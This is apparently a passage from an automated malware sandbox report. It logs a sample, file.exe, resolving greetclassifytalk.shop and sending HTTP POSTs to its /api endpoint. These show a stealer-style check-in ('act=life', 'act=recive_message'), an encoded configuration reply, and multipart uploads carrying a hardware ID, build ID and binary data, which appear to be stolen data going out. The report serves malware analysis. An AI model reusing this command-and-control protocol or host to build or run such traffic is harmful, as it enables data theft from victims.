                                                                            Apr 20, 2024 19:20:56.473897934 CEST1.1.1.1192.168.2.40x4a42No error (0)greetclassifytalk.shop172.67.177.98A (IP address)IN (0x0001)false
                                                                            Apr 20, 2024 19:20:56.473897934 CEST1.1.1.1192.168.2.40x4a42No error (0)greetclassifytalk.shop104.21.51.78A (IP address)IN (0x0001)false
                                                                            • greetclassifytalk.shop
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449730172.67.177.984436816C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-04-20 17:20:56 UTC269OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8
                                                                            Host: greetclassifytalk.shop
                                                                            2024-04-20 17:20:56 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                            Data Ascii: act=life
                                                                            2024-04-20 17:20:57 UTC806INHTTP/1.1 200 OK
                                                                            Date: Sat, 20 Apr 2024 17:20:57 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=vsbfm90er006thjum337bgkl9t; expires=Wed, 14-Aug-2024 11:07:36 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNa2Yvly%2BYjCut3Hpg4nn%2FWsTp4kYJboorV6dz01Ern%2Bd%2B3uLAlNve213WvxWtU15SZOuNWUbnRMmKX3WkzLEl7Ugeipulm2zwiuDxWAxzbJxR5oljLfaQYiM8OBJ1IhNlqJsfef6WxN"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8776ced3a896b0d3-ATL
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-04-20 17:20:57 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                            Data Ascii: 2ok
                                                                            2024-04-20 17:20:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449731172.67.177.984436816C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-04-20 17:20:57 UTC270OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 49
                                                                            Host: greetclassifytalk.shop
                                                                            2024-04-20 17:20:57 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 73 78 46 4b 75 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                                                            Data Ascii: act=recive_message&ver=4.0&lid=4sxFKu--&j=default
                                                                            2024-04-20 17:20:58 UTC804INHTTP/1.1 200 OK
                                                                            Date: Sat, 20 Apr 2024 17:20:58 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=ofenmrotkttjpeacesrac65ih3; expires=Wed, 14-Aug-2024 11:07:36 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vx3jrLHbohruXZX%2BbwS001JhYvxvMLroaYpA6Wh6LFrCtcCwMAN1l4IX7uqWvAdmVGA3E9Ux3hOCdkX7%2B2ENlxociny6cSEu8xI5vbtuOvJZ2qfzA430R5x%2BMJpHo4GnKZGmBRHg0rH9"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8776ced8ce8f6760-ATL
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-04-20 17:20:58 UTC565INData Raw: 35 30 35 0d 0a 6b 78 46 62 62 7a 4a 64 36 76 34 53 44 66 55 41 67 54 32 77 45 77 62 46 51 45 6e 4c 67 6a 51 6e 78 71 43 77 6c 49 4f 66 71 50 66 6f 47 31 4a 4e 52 48 2f 51 33 69 59 68 2f 77 6d 6a 54 74 55 78 50 4f 55 30 4f 37 37 6e 47 43 33 50 67 74 48 77 6f 61 57 49 6b 66 4a 39 4b 41 6f 65 56 2b 50 63 66 33 58 58 4f 71 46 6d 75 68 70 39 7a 30 6c 41 36 65 64 61 42 66 79 41 6b 75 50 6d 2f 63 32 50 35 33 51 31 48 46 73 79 68 4c 35 2f 61 49 46 68 37 46 7a 44 65 43 69 73 4c 32 76 6e 69 44 30 75 35 4d 58 4b 74 72 6d 2f 69 72 72 32 5a 54 6f 69 55 79 36 42 33 44 34 48 2f 41 6d 6a 57 4d 51 78 50 4f 56 69 46 65 6e 79 56 56 57 6e 7a 63 50 49 6f 61 58 54 71 37 46 34 4c 77 70 41 50 4a 36 58 66 57 4f 47 58 4b 4d 48 68 69 4d 32 39 58 42 35 74 71 41 2b 4c 72 75 71 75 63
                                                                            Data Ascii: 505kxFbbzJd6v4SDfUAgT2wEwbFQEnLgjQnxqCwlIOfqPfoG1JNRH/Q3iYh/wmjTtUxPOU0O77nGC3PgtHwoaWIkfJ9KAoeV+Pcf3XXOqFmuhp9z0lA6edaBfyAkuPm/c2P53Q1HFsyhL5/aIFh7FzDeCisL2vniD0u5MXKtrm/irr2ZToiUy6B3D4H/AmjWMQxPOViFenyVVWnzcPIoaXTq7F4LwpAPJ6XfWOGXKMHhiM29XB5tqA+Lruquc
                                                                            2024-04-20 17:20:58 UTC727INData Raw: 45 44 6d 47 6e 58 31 76 68 57 72 6f 56 4e 64 6a 62 36 34 76 4a 71 6e 74 58 45 71 6e 77 74 58 38 36 2f 4c 41 6b 66 78 2b 50 77 31 51 66 38 62 30 47 77 54 58 5a 66 73 66 69 6a 4d 6b 68 43 63 37 72 75 78 41 42 35 36 43 75 70 33 2b 73 36 48 58 73 78 74 53 46 44 68 55 34 39 78 33 59 39 63 36 6f 52 2f 61 64 47 65 6b 4b 53 53 71 36 46 31 58 70 4e 44 55 2b 2b 54 76 7a 4a 44 2f 65 54 6f 66 57 6a 47 4f 6e 33 6c 6b 6e 6d 66 6b 57 35 49 2f 44 4d 78 4a 61 36 37 34 46 68 33 6d 67 76 50 37 36 76 48 41 67 76 45 7a 55 57 5a 50 63 65 44 33 61 51 66 38 43 61 4e 59 33 6a 45 38 35 57 49 76 71 4f 52 58 51 61 72 4d 31 76 72 6e 38 38 65 61 39 33 6b 35 43 6c 6f 33 67 4a 31 39 5a 4a 68 69 35 6c 4c 57 64 32 69 6d 4a 32 76 6e 69 44 30 75 35 4d 58 4b 74 72 6d 2f 69 72 76 32 63 43 74
                                                                            Data Ascii: EDmGnX1vhWroVNdjb64vJqntXEqnwtX86/LAkfx+Pw1Qf8b0GwTXZfsfijMkhCc7ruxAB56Cup3+s6HXsxtSFDhU49x3Y9c6oR/adGekKSSq6F1XpNDU++TvzJD/eTofWjGOn3lknmfkW5I/DMxJa674Fh3mgvP76vHAgvEzUWZPceD3aQf8CaNY3jE85WIvqORXQarM1vrn88ea93k5Clo3gJ19ZJhi5lLWd2imJ2vniD0u5MXKtrm/irv2cCt
                                                                            2024-04-20 17:20:58 UTC1369INData Raw: 33 34 65 37 0d 0a 54 68 55 6c 39 49 59 42 49 34 4b 69 44 53 53 64 6d 6a 6e 65 6d 6e 70 35 6c 70 41 71 38 7a 53 2b 4f 44 77 7a 4a 48 38 63 79 73 4c 51 6a 69 4a 6e 33 4e 70 6b 6d 62 6a 58 74 64 30 59 4b 38 6d 4a 36 61 67 47 43 33 50 71 5a 4c 78 2b 62 32 53 31 37 46 63 4c 67 4e 47 4e 4a 79 62 59 48 36 74 49 4e 5a 63 33 48 39 6a 73 57 4a 44 77 76 38 59 4c 63 2f 62 75 70 32 4b 76 63 32 5a 73 53 74 37 54 56 6b 74 6d 70 68 32 5a 4a 78 77 38 56 58 57 63 47 57 67 4c 53 71 69 35 56 70 50 72 38 62 41 2f 75 6a 2b 32 4a 48 78 65 44 4d 4c 45 48 48 67 39 78 73 76 6b 48 71 6a 42 35 41 78 51 4b 6f 79 4a 36 4c 32 55 56 57 52 77 64 7a 34 35 75 75 4b 2f 5a 70 73 64 32 55 37 4a 75 44 33 47 79 2b 51 62 71 4d 48 6b 44 46 72 71 43 30 6a 71 65 46 53 53 4b 44 44 33 2f 72 6f 2f 73
                                                                            Data Ascii: 34e7ThUl9IYBI4KiDSSdmjnemnp5lpAq8zS+ODwzJH8cysLQjiJn3NpkmbjXtd0YK8mJ6agGC3PqZLx+b2S17FcLgNGNJybYH6tINZc3H9jsWJDwv8YLc/bup2Kvc2ZsSt7TVktmph2ZJxw8VXWcGWgLSqi5VpPr8bA/uj+2JHxeDMLEHHg9xsvkHqjB5AxQKoyJ6L2UVWRwdz45uuK/Zpsd2U7JuD3Gy+QbqMHkDFrqC0jqeFSSKDD3/ro/s
                                                                            2024-04-20 17:20:58 UTC1369INData Raw: 65 30 31 67 4d 6f 53 58 66 43 32 69 59 65 31 52 31 57 63 6b 7a 30 6b 30 35 34 67 39 58 4d 79 70 75 62 62 6d 38 59 72 4e 73 7a 4d 32 44 46 30 31 67 35 4a 38 62 70 64 6d 34 46 58 53 66 6d 47 68 4b 69 4b 70 38 6c 46 4b 70 63 50 5a 2f 65 7a 7a 7a 35 54 30 64 48 6c 44 4f 46 54 6a 33 48 64 33 31 7a 71 68 48 2f 39 59 58 75 64 4b 51 4c 61 75 50 69 36 39 71 72 6d 64 6f 66 72 47 31 61 6b 78 65 51 6c 61 50 34 57 57 65 32 43 55 5a 65 31 66 33 33 74 32 72 79 49 72 70 2b 5a 58 53 61 48 44 33 76 58 7a 38 63 79 59 39 33 73 72 54 52 35 58 34 2f 63 77 61 49 38 69 75 78 32 53 55 57 2b 72 49 53 65 6f 35 78 52 6b 72 73 48 5a 2b 71 50 49 79 5a 76 2f 64 43 39 4e 4f 46 53 58 30 68 67 45 6a 67 71 49 4e 4a 4a 32 61 4f 64 36 61 65 6e 6b 55 6b 6d 6b 78 64 7a 79 35 2f 44 4e 6e 76 78
                                                                            Data Ascii: e01gMoSXfC2iYe1R1Wckz0k054g9XMypubbm8YrNszM2DF01g5J8bpdm4FXSfmGhKiKp8lFKpcPZ/ezzz5T0dHlDOFTj3Hd31zqhH/9YXudKQLauPi69qrmdofrG1akxeQlaP4WWe2CUZe1f33t2ryIrp+ZXSaHD3vXz8cyY93srTR5X4/cwaI8iux2SUW+rISeo5xRkrsHZ+qPIyZv/dC9NOFSX0hgEjgqINJJ2aOd6aenkUkmkxdzy5/DNnvx
                                                                            2024-04-20 17:20:58 UTC1369INData Raw: 54 71 4f 6e 58 56 71 6c 6d 62 76 56 64 52 79 5a 36 67 74 4a 4b 47 67 47 43 33 50 71 5a 4c 78 2b 62 32 53 31 37 46 57 4c 67 5a 65 4f 63 6a 30 47 33 44 5a 43 6f 68 47 75 68 6f 50 35 79 55 6e 36 62 67 55 42 61 6a 4c 31 50 44 6b 38 63 75 54 2b 58 59 78 43 56 45 35 6a 70 39 2f 61 35 4a 6a 37 46 76 65 66 32 36 6d 49 79 65 69 37 31 31 41 35 49 79 36 6e 59 71 39 7a 59 32 78 4b 33 74 4e 59 54 79 65 69 32 42 6a 31 77 71 49 51 4a 77 5a 44 37 35 4b 51 4d 4b 67 55 55 6e 6b 6d 70 43 32 34 4f 2f 41 6e 2f 39 32 4e 67 68 54 4d 49 2b 52 64 6d 4f 64 61 2b 74 5a 33 58 68 32 70 43 34 6c 72 75 35 61 53 36 6e 49 30 66 75 68 73 36 4c 2b 6d 6a 4d 2b 46 52 42 6e 79 74 78 63 61 4a 70 4d 36 46 50 56 4d 51 7a 4d 50 57 58 42 69 30 38 74 7a 36 6d 53 38 65 32 39 6b 74 65 78 66 7a 4d 42
                                                                            Data Ascii: TqOnXVqlmbvVdRyZ6gtJKGgGC3PqZLx+b2S17FWLgZeOcj0G3DZCohGuhoP5yUn6bgUBajL1PDk8cuT+XYxCVE5jp9/a5Jj7Fvef26mIyei711A5Iy6nYq9zY2xK3tNYTyei2Bj1wqIQJwZD75KQMKgUUnkmpC24O/An/92NghTMI+RdmOda+tZ3Xh2pC4lru5aS6nI0fuhs6L+mjM+FRBnytxcaJpM6FPVMQzMPWXBi08tz6mS8e29ktexfzMB
                                                                            2024-04-20 17:20:58 UTC1369INData Raw: 6c 78 5a 35 31 71 37 46 44 41 63 47 75 75 4a 53 43 6b 37 31 68 41 71 74 44 56 2f 65 72 31 77 35 76 33 4d 33 64 6c 4f 31 54 49 6d 32 67 76 7a 79 43 6a 61 64 46 2f 62 37 59 74 4b 4b 57 67 50 69 36 37 6a 4c 71 64 2b 4a 57 68 2f 72 46 30 4e 55 30 49 66 63 69 51 66 6d 2b 59 62 75 39 55 32 6e 42 6f 71 53 55 75 6f 4f 68 65 56 36 58 47 32 76 66 76 38 73 75 52 39 48 59 39 43 6c 51 35 68 39 77 2b 42 2f 77 4a 6f 31 6a 4b 4d 54 7a 6c 59 67 53 75 39 58 64 2f 35 4b 71 35 36 61 2b 56 6f 59 79 5a 47 46 4a 4e 56 7a 50 49 78 44 49 76 6e 57 6e 6e 58 4e 5a 30 61 36 59 6a 4c 62 76 6e 58 31 65 71 7a 39 33 2b 36 66 54 4c 6b 66 52 2b 50 77 46 61 50 6f 2b 53 66 6d 66 58 4c 49 73 30 75 54 46 6a 76 32 4a 7a 36 36 42 33 56 62 2f 51 78 50 76 41 38 4d 58 56 6d 52 67 6d 51 7a 68 55 6b
                                                                            Data Ascii: lxZ51q7FDAcGuuJSCk71hAqtDV/er1w5v3M3dlO1TIm2gvzyCjadF/b7YtKKWgPi67jLqd+JWh/rF0NU0IfciQfm+Ybu9U2nBoqSUuoOheV6XG2vfv8suR9HY9ClQ5h9w+B/wJo1jKMTzlYgSu9Xd/5Kq56a+VoYyZGFJNVzPIxDIvnWnnXNZ0a6YjLbvnX1eqz93+6fTLkfR+PwFaPo+SfmfXLIs0uTFjv2Jz66B3Vb/QxPvA8MXVmRgmQzhUk
                                                                            2024-04-20 17:20:58 UTC1369INData Raw: 46 5a 2b 70 58 31 6e 68 6b 6f 79 67 6d 72 75 42 54 53 4b 48 47 33 50 4c 6d 2f 63 61 61 39 6e 73 32 43 56 41 77 79 4e 49 59 42 50 77 69 35 45 65 53 4b 53 62 6e 41 69 43 2f 77 56 68 4f 74 6f 4b 36 6e 66 36 7a 6f 76 37 6f 47 31 4a 6d 45 44 69 45 33 43 67 74 31 32 7a 71 58 74 70 2f 61 4b 38 6d 4f 61 6e 72 58 30 71 6c 7a 64 4c 31 34 50 66 43 68 2f 64 7a 4d 67 56 58 4e 34 79 53 59 6d 36 59 49 71 30 33 75 52 6f 6b 6f 44 70 72 38 61 49 57 64 4c 4c 46 31 66 6d 6a 31 4d 32 4f 38 48 6b 36 42 6c 78 2f 34 50 64 76 49 66 38 4a 2b 6a 65 35 47 69 53 67 4c 6d 76 78 6f 68 5a 49 71 4d 2f 57 35 4f 33 39 79 70 7a 32 65 53 73 43 58 7a 4b 4c 6e 48 56 39 6c 6e 44 73 56 4e 64 79 59 4b 67 74 4a 36 48 71 46 67 76 4d 71 62 6d 32 35 75 57 4b 7a 62 4d 7a 46 51 35 42 4e 63 71 37 61 6e
                                                                            Data Ascii: FZ+pX1nhkoygmruBTSKHG3PLm/caa9ns2CVAwyNIYBPwi5EeSKSbnAiC/wVhOtoK6nf6zov7oG1JmEDiE3Cgt12zqXtp/aK8mOanrX0qlzdL14PfCh/dzMgVXN4ySYm6YIq03uRokoDpr8aIWdLLF1fmj1M2O8Hk6Blx/4PdvIf8J+je5GiSgLmvxohZIqM/W5O39ypz2eSsCXzKLnHV9lnDsVNdyYKgtJ6HqFgvMqbm25uWKzbMzFQ5BNcq7an
                                                                            2024-04-20 17:20:58 UTC1369INData Raw: 57 4d 6f 78 50 4f 56 69 43 4c 37 32 58 46 37 6b 71 72 6e 70 72 35 57 68 6a 4a 6b 59 55 6b 31 58 4d 38 6a 45 4d 69 2b 61 5a 65 31 58 31 48 39 69 74 53 34 6b 72 2b 42 58 54 36 6e 4f 32 66 48 76 39 73 79 51 2f 48 4d 2f 43 31 51 37 6a 4a 4a 7a 4c 39 6b 4b 69 44 53 53 64 6e 7a 6e 65 6d 6e 70 78 33 74 30 35 75 48 46 34 4f 76 36 78 6f 50 36 63 6a 6f 62 58 53 2f 49 39 42 74 77 32 51 71 49 52 72 6f 61 44 2b 63 6c 4a 2b 6d 34 46 41 57 76 7a 4e 66 33 37 66 66 4e 6d 2b 4e 79 4d 77 46 52 4f 49 2b 58 59 6d 53 46 61 65 74 63 33 48 6c 74 70 79 77 72 71 4f 31 57 42 65 71 71 75 5a 32 68 2b 74 4c 56 71 54 46 35 4b 48 4d 6f 6e 70 59 79 54 49 42 30 36 56 6a 65 5a 32 2b 6d 49 54 32 6b 38 42 59 74 7a 39 32 63 6e 6f 72 6b 6f 76 36 61 4d 7a 34 42 45 47 66 4b 33 48 74 67 6d 57 2f
                                                                            Data Ascii: WMoxPOViCL72XF7kqrnpr5WhjJkYUk1XM8jEMi+aZe1X1H9itS4kr+BXT6nO2fHv9syQ/HM/C1Q7jJJzL9kKiDSSdnznemnpx3t05uHF4Ov6xoP6cjobXS/I9Btw2QqIRroaD+clJ+m4FAWvzNf37ffNm+NyMwFROI+XYmSFaetc3HltpywrqO1WBeqquZ2h+tLVqTF5KHMonpYyTIB06VjeZ2+mIT2k8BYtz92cnorkov6aMz4BEGfK3HtgmW/
                                                                            2024-04-20 17:20:58 UTC1369INData Raw: 53 72 50 53 55 44 70 35 45 63 46 2f 49 43 43 70 4c 71 6f 6d 63 4b 68 49 56 46 6d 54 33 48 67 39 32 6b 48 2f 41 6d 6a 53 5a 49 70 4a 76 56 73 51 38 4b 4c 46 6c 66 6b 6d 70 43 32 70 76 50 48 6c 50 4a 39 4f 68 39 43 4f 59 75 4b 63 79 69 70 58 4d 4a 53 32 58 31 70 71 43 6b 56 6c 38 46 62 54 71 6a 50 33 66 33 66 77 39 2b 57 2f 33 30 2b 47 30 46 2f 78 76 51 62 42 4e 64 74 6f 77 65 51 53 43 54 76 59 68 54 6e 69 44 30 75 35 4e 71 53 72 71 4f 39 2f 35 62 2f 66 54 34 62 51 58 4b 70 6b 58 74 6a 6d 6d 33 6f 48 35 77 5a 44 38 78 69 4c 65 6d 34 46 42 58 71 71 72 6d 64 6f 66 6e 62 31 61 6b 78 61 56 38 4c 61 74 76 4c 49 44 33 2f 43 66 77 52 75 68 70 39 7a 30 6c 41 36 66 59 57 48 65 61 51 6e 4a 36 4b 6c 6f 71 48 73 53 74 37 54 52 63 38 6d 6f 35 32 62 49 46 68 70 47 48 73
                                                                            Data Ascii: SrPSUDp5EcF/ICCpLqomcKhIVFmT3Hg92kH/AmjSZIpJvVsQ8KLFlfkmpC2pvPHlPJ9Oh9COYuKcyipXMJS2X1pqCkVl8FbTqjP3f3fw9+W/30+G0F/xvQbBNdtoweQSCTvYhTniD0u5NqSrqO9/5b/fT4bQXKpkXtjmm3oH5wZD8xiLem4FBXqqrmdofnb1akxaV8LatvLID3/CfwRuhp9z0lA6fYWHeaQnJ6KloqHsSt7TRc8mo52bIFhpGHs


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.449732172.67.177.984436816C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-04-20 17:20:58 UTC288OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 18158
                                                                            Host: greetclassifytalk.shop
                                                                            2024-04-20 17:20:58 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 31 46 33 38 30 39 32 31 37 35 42 43 38 30 38 45 36 36 35 38 39 33 37 41 44 34 46 31 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 73 78 46 4b 75 2d 2d 0d 0a 2d 2d 62
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4D1F38092175BC808E6658937AD4F1B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4sxFKu----b
                                                                            2024-04-20 17:20:58 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
                                                                            Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                                            2024-04-20 17:20:59 UTC806INHTTP/1.1 200 OK
                                                                            Date: Sat, 20 Apr 2024 17:20:59 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=l12a5lccrcqhvgjtmoltjo1pt1; expires=Wed, 14-Aug-2024 11:07:37 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bJGd6rUpgGVMPJEX8T56Joyg4tHaxfUa0sVfbquLem%2BqJiX0FiaOr62gVzieHQtRw1ZGLPQEmWbtVqjRy9h2bHnQUJ05YOmB1%2BmU4XTlCuAyz2o9nHCqbZWBOjwQn%2Bj7UnYzI7zrm%2Bh8"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8776ceddec2106e6-ATL
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-04-20 17:20:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                            Data Ascii: fok 81.181.57.52
                                                                            2024-04-20 17:20:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.449733172.67.177.984436816C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-04-20 17:20:59 UTC287OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8779
                                                                            Host: greetclassifytalk.shop
                                                                            2024-04-20 17:20:59 UTC8779OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 31 46 33 38 30 39 32 31 37 35 42 43 38 30 38 45 36 36 35 38 39 33 37 41 44 34 46 31 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 73 78 46 4b 75 2d 2d 0d 0a 2d 2d 62
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4D1F38092175BC808E6658937AD4F1B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4sxFKu----b
                                                                            2024-04-20 17:20:59 UTC810INHTTP/1.1 200 OK
                                                                            Date: Sat, 20 Apr 2024 17:20:59 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=n3rn7gsq8n7di9ks42ggue63u7; expires=Wed, 14-Aug-2024 11:07:38 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aQNta%2F0koBiSdxwKc4o5oOTpUmMA3lTKJn3wAHf2Q9ojn9n1QDyv1p12xFXvSr76L%2BBnqGd%2FzT0AvlTDqK68hNWzh%2BZtU2wLXQLkC3LCcvS%2BqjpB4fNj4OYfxppYpvYcV6V%2FnPGFqYCN"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8776cee399391f9e-ATL
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-04-20 17:20:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                            Data Ascii: fok 81.181.57.52
                                                                            2024-04-20 17:20:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.449734172.67.177.984436816C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-04-20 17:21:00 UTC288OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 20432
                                                                            Host: greetclassifytalk.shop
